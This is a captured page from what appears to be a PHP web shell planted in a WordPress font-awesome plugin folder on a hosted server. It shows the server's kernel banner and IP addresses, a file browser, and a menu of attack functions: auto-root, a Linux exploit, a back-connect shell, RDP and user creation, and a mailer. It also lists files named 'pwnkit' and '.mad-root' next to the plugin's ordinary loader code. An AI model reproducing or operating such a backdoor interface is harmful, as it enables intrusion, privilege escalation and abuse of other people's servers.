Linux webm019.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.128.20.19 | : 216.73.216.176
Cant Read [ /etc/named.conf ]
8.0.30
nicedoo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
nicedoo /
www /
wp-content /
plugins /
font-awesome /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
compat-js
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
344
B
-rw-r--r--
defines.php
4.15
KB
-rw-r--r--
font-awesome-init.php
1.4
KB
-rw-r--r--
font-awesome.php
16.93
KB
-rw-r--r--
index.php
545
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
23.43
KB
-rw-r--r--
uninstall.php
340
B
-rw-r--r--
v3shims.php
19.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : font-awesome-init.php
<?php namespace FortAwesome; // Loader pattern follows that of wponion. // Thanks to Varun Sridharan <varunsridharan23@gmail.com>. if ( ! defined( 'ABSPATH' ) ) { exit; } require_once trailingslashit( __DIR__ ) . 'defines.php'; require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/class-fontawesome-exception.php'; require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/error-util.php'; if ( ! defined( 'FONTAWESOME_OFFICIAL_LOADED' ) ) { register_deactivation_hook( FONTAWESOME_DIR_PATH . 'index.php', function() { try { require_once FONTAWESOME_DIR_PATH . 'includes/class-fontawesome-deactivator.php'; FontAwesome_Deactivator::deactivate(); } catch ( Exception $e ) { /** * This will not block the deactivation since we're not exiting, but it will probably flash * this error message before redirecting to plugins.php to report that the plugin was deactivated. */ echo '<div class="error"><p>Fatal exception while deactivating Font Awesome.</p></div>'; } catch ( Error $e ) { echo '<div class="error"><p>Fatal error while deactivating Font Awesome.</p></div>'; } } ); try { require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/class-fontawesome.php'; define( 'FONTAWESOME_OFFICIAL_LOADED', 1 ); fa()->run(); } catch ( Exception $e ) { notify_admin_fatal_error( $e ); } catch ( Error $e ) { notify_admin_fatal_error( $e ); } }
Close